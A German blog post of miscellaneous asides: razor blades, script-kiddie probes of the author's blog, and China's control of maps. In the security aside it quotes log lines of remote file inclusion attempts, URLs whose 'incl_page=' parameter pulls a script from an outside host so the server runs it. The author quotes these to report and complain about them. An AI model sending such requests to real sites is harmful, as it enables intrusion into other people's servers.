Beiläufiges - 40

Im Herbst, wenn der Sonne die Kraft fehlt, sich über den Horizont zu heben und das Nebelmeer das Moor verschlingt, treffen sich die Männer der Schmiedegilde. Dunkle Ehrenmänner, glatte Gesichter mit böse blitzenden Augen unter dem Vorsitz des finsteren Meisters Wilkinson, dessen Bajonette schon das Empire gross und die Eingeborenen blutleer gemacht haben. Da sitzen sie dann und trinken und flüstern. Sie raunen "Protector", "Contour Plus" und "Sensor Excel", zum Anstossen rufen sie "Mach 3!" und dann lachen sie, ein heiseres Lachen voller Hass auf die Menschheit.

Und wenn sie auseinandergehen, haben sie ein neues Rasierklingensystem entwickelt, zu dem noch niemand einen passenden Griff zuhause hat. Und ich Depp fall jedes Mal drauf rein...

Die beiden grossen Kirchen schliessen sich zusammen und bauen eine Arche. An der Mangfall...

Hätte ich nur am Montag keinen Link auf ein Blog namens "blogator" gesetzt... Jetzt wird dieser Beitrag bei irgendwelchen Suchmaschinen mit diesem Begriff gefunden und jedes script kiddie probiert mal aus, ob er bei mir die Sicherheitslücke der zufällig gleichnamigen französischen Blogsoftware ausnützen kann. Ihr könnt mich damit in Ruhe lassen, ich verwende eine andere Software, die bestimmt Lücken, aber halt andere hat.

Mein Log ist jedenfalls voll von Versuchen der Art

GET /2008/03/31/kurzer-ausflug-nach-25// include/struct_admin.php? incl_page= http://---irgendein-provider---/ imgcls/cmd2.txt?????

Wenn man dann bei ---irgendein-provider---/ imgcls/cmd2.txt nachschaut, was da eingebunden wird, findet man ein Script, das anscheinend nur Betriebssystem, Username und Plattenplatz ausgibt. Nichts weiter tragisches, anscheinend nur die Vorbereitung spezifischerer Versuche. Die Versuche finden ausschliesslich bei diesem Beitrag statt, sind also kein Rundumschlag in irgendwelchen Blogs, sondern bestimmt das Ergebnis einer Suche bei irgendeiner Suchmaschine.

Zwei dieser Webprovider hab ich mal testweise angeschrieben, dass sie ihren Kunden bitte bescheidgeben:

• Eine Seite war bei Geocities. Da hab ich Yahoo eine Mail geschreiben. Das eigentlich dafür vorgesehene Kontaktformular wurde auf deren Server nicht gefunden...


• Der andere Provider ist ein kleiner Provider aus Coburg. Der hatte ein Formular für Petzer, zwingt mich aber, dort dazu unsinnige "Muss-Felder" mit für beide Seiten nutzlosen Infos auszufüllen. Es hat keinen Sinn, die IP-Adresse einer virenverseuchten Homepage abzutippen. Aber wenn die das möchten, geb ich gern irgendwas ein...

Die Kunden können natürlich auch wenig dafür (ausser dass sie hackbare Anwendungen ins Netz stellen), aber sie sollten wenigstens informiert sein, dass ihre Homepage über z.B. "Entgiftungspflaster mit der Kraft alter Bäume" im Nebenjob als Virenschleuder dient. Viel Erfolg versprech ich mir davon aber nicht. Bei den meisten Providern beschränkt sich das Abuse-Handling auf den Aufbau von Hürden für den Beschwerdeführer.

Ausser den aufgemachten Servern mit dem Script gibts noch einen zweiten Beteiligten, den der diese URL zusammenbastelt und bei mir aufruft. Ich vermute aber, der kann auch nichts dafür, das geht auch schon automatisch ohne Wissen und Beteiligung des Menschen vor dem Monitor. Anderfalls wären die Leute entweder alle mit Textbrowsern unterwegs oder würden im Sekundentakt den Browser wechseln (oder dessen Identifikation mit jedem aufruf wechseln lassen). Wäre denkbar, aber für Kinder eher untypisch...

Die Internetprovider dieser Leute kann ich allerdings nicht anschreiben. Da ich hier ja auf die Speicherung der IP-Adressen der Besucher verzichte, kann ich für vergangene Zugriffe die IP-Adresse der Besucher nur ungefähr sagen. Z.B. kommt dann ein verstümmeltes "bzrhbcesvl.schulradio-bayern.de" raus, damit brauche ich beim Provider nicht ankommen. Und aussschalten mag ich die Pseudonymisierung jetzt auch nicht, dazu werden auch bei Internetprovidern Hinweise der Art "He Dein Kunde hackt hier rum oder hat nen Virus" zu missmutig bearbeitet.

Nachtrag: Die suchen bei Technorati oder Google-Blogsuche nach "blogator". 2 Stunden nach Veröffentlichung tauchen die ersten Zugriffe auf diesen Beitrag auf:

/2008/04/05/falsche-luecke// _blogadata/ include/ struct_admin.php? incl_page= http:// ---egal --- /ioncube/readme.txt??

Nachtrag 2: 5 Stunden nach meiner Mail hat übrigens Geocities die Seite abgeklemmt. Ich weiss natürlich nicht, ob ich der einzige war, der was geschrieben hat, vermutlich suchen die auch selbst ihre Seiten nach Schädlingen ab. Die schnelle Reaktion hat mich jedenfalls überrascht.

wird hier nicht gebaut. Die Gärtnerei zeigt im Frühling, wie ihre ausgelegten schwarzen Plastikbahnen ohne Bewuchs aussehen.

Bei Heise steht, dass China einheimische Kartendienste besser kontrollieren will, weil die geheime Geodaten veröffentlichen und zudem oft völlig falsche Grenzen eingezeichnet haben. Taiwan z.B. wird gern als Staat geführt, obwohl das natürlich Teil des ganzen Chinas ist. Eine Meinung die die Taiwanesen übrigens teilen, strittig ist ja nur die Frage, welcher Teil des Landes gerade die falsche Regierung hat.

Ausländische Dienste werden darauf hingewiesen, dass sie nur unter strenger Kontrolle der Regierung vermessen und kartographieren dürfen.

Müssen wir halt auf altes Material zurückgreifen. Mein Schulatlas von 1937 dürfte den Chinesen ja ganz gut passen. Der Westen ist zwar so halb autonom gefärbt, aber bis auf Kleinigkeiten sind sie mit der Grenze dort sicher einverstanden. Dieses Mandschukuo im Nordosten müsste halt noch weg und dass Taiwan seit 1895 nur ganz kurzzeitig von den Festlandschinesen regiert wurde, sollte man besser auch nicht erwähnen.

Solche Befindlichkeiten gibts übrigens auch in anderen Ländern. Ich weiss nicht, wie es heute ist, aber als ich 1983 das erste Mal in die Türkei reisen wollte, mussten wir ein paar Landkarten daheimlassen, weil dort eine Gegend namens "Kurdistan" verzeichnet war. So wie auch im alten Schulatlas. Solche Karten hätten die Grenzer bei der Einreise beschlagnahmt.

War blöd, weil wir wollten ja den Ararat besteigen und der liegt numal in der Gegend mit K. an der Grenze zu der Gegend die hier mit "Armenien" bezeichnet wird. Eine Landschaft die es unter diesem Namen in der Türkei ebenfalls nicht gibt und niemals gab ;)